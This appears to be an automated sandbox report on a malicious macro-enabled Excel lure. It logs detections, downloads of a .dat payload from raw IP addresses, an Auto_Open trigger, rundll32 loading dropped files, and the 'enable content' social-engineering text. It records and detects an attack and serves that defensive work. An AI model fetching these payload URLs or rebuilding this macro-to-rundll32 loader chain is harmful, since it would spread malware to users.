Source: DEBT_2026004977_03182021.xlsm |
Avira: detected |
Source: http://185.82.219.219/44375.7393215278.dat |
Avira URL Cloud: Label: malware |
Source: DEBT_2026004977_03182021.xlsm |
Virustotal: Detection: 56% |
Perma Link |
Source: DEBT_2026004977_03182021.xlsm |
ReversingLabs: Detection: 68% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49169 -> 185.82.219.219:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 188.127.231.55:80 |
Source: Yara match |
File source: sharedStrings.xml, type: SAMPLE |
Source: Joe Sandbox View |
IP Address: 45.140.146.180 45.140.146.180 |
Source: Joe Sandbox View |
IP Address: 45.140.146.180 45.140.146.180 |
Source: Joe Sandbox View |
IP Address: 188.127.231.55 188.127.231.55 |
Source: Joe Sandbox View |
IP Address: 188.127.231.55 188.127.231.55 |
Source: global traffic |
HTTP traffic detected: GET /44375.7393215278.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.219Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A4B8C50.jpeg |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /44375.7393215278.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.219Connection: Keep-Alive |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Jun 2021 15:46:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a c2 30 10 86 77 c1 77 38 3b e9 90 a6 85 8e 31 8b 28 38 e8 22 3e 40 62 ce 26 90 26 12 53 b4 6f 6f a2 15 c4 d9 d1 f1 fe fb ee bb e3 98 8e 9d e5 d3 09 d3 28 14 67 d1 44 8b bc a9 1a d8 fb 08 1b df 3b c5 e8 2b 64 f4 89 24 54 7a 35 80 6c 4f de fa b0 2c 6e da 44 2c b2 e2 84 2e 62 e0 4c d7 df 86 94 30 3a b6 f3 ae 04 8d 95 6b 8d bb d3 ba ac 9b b2 82 f9 51 f6 2e f6 8b 4f 96 e6 6d d9 4e df 97 ce 08 01 01 17 a1 94 71 2d 44 0f ca 5c 85 b4 08 bb c3 76 0d c2 29 58 e9 e0 3b 84 73 30 e8 94 1d 00 43 f0 21 4d b4 08 84 64 d7 5f f1 cb 5f 3c 00 85 02 e0 de 44 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: c60ww8;1(8">@b&&Soo(gD;+d$Tz5lO,nD,.bL0:kQ.OmNq-D\v)X;s0C!Md__<D0 |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content bytton from the yellow bar above ,,,,,, L' Rr ;^1 I m m RunDLL |~| ,0 There was |
Source: Screenshot number: 8 |
Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En |
Source: Screenshot number: 8 |
Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable Content bytton from the yellow bar above |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: EXEC |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: Sheet size: 19412 |
Source: workbook.xml |
Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F0EB3E64-B098-469B-980C-4533D5392CC4}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook> |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal96.troj.expl.evad.winXLSM@7/7@0/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$DEBT_2026004977_03182021.xlsm |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRC2B2.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
Source: DEBT_2026004977_03182021.xlsm |
Virustotal: Detection: 56% |
Source: DEBT_2026004977_03182021.xlsm |
ReversingLabs: Detection: 68% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing2.xml |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing3.xml |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |